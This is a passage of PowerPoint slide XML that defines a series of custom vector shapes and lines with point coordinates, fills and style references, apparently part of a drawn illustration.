          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="CustomShape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3646440" y="3552840"/>
            <a:ext cx="70920" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="45" h="55">
                <a:moveTo>
                  <a:pt x="3" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>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521" name="CustomShape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3544920" y="3618000"/>
            <a:ext cx="58320" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="10">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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2" name="CustomShape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3544920" y="3578400"/>
            <a:ext cx="58320" cy="17280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="11">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>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3" name="CustomShape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600360" y="3559320"/>
            <a:ext cx="95040" cy="180720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="60" h="114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="CustomShape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648240" y="3519360"/>
            <a:ext cx="123480" cy="23400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="78" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="CustomShape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576600" y="3743280"/>
            <a:ext cx="207720" cy="69480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="131" h="44">
                <a:moveTo>
                  <a:pt x="54" y="43"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="43"/>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6" name="CustomShape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3532320" y="3762360"/>
            <a:ext cx="213840" cy="61560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="135" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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7" name="CustomShape 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568680" y="3753000"/>
            <a:ext cx="209160" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="36">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="129" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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8" name="CustomShape 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551400" y="3755880"/>
            <a:ext cx="210600" cy="61560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="133" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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529" name="Line 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086000" y="4249440"/>
            <a:ext cx="434880" cy="180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530" name="CustomShape 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697280" y="3956040"/>
            <a:ext cx="321840" cy="163080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="203" h="103">
                <a:moveTo>
                  <a:pt x="78" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="CustomShape 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859280" y="3416400"/>
            <a:ext cx="149040" cy="54432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532" name="CustomShape 320"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700520" y="3570120"/>
            <a:ext cx="201240" cy="54432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533" name="CustomShape 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700520" y="3570120"/>
            <a:ext cx="201240" cy="544320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="CustomShape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697280" y="3411360"/>
            <a:ext cx="321840" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="203" h="104">
                <a:moveTo>
                  <a:pt x="78" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="CustomShape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697280" y="3411360"/>
            <a:ext cx="321840" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="203" h="104">
                <a:moveTo>
                  <a:pt x="78" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Line 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019480" y="3422520"/>
            <a:ext cx="1440" cy="53352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537" name="Line 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4902120" y="3956040"/>
            <a:ext cx="117360" cy="15876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538" name="CustomShape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724280" y="3641760"/>
            <a:ext cx="134640" cy="313920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="CustomShape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724280" y="3641760"/>
            <a:ext cx="134640" cy="313920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
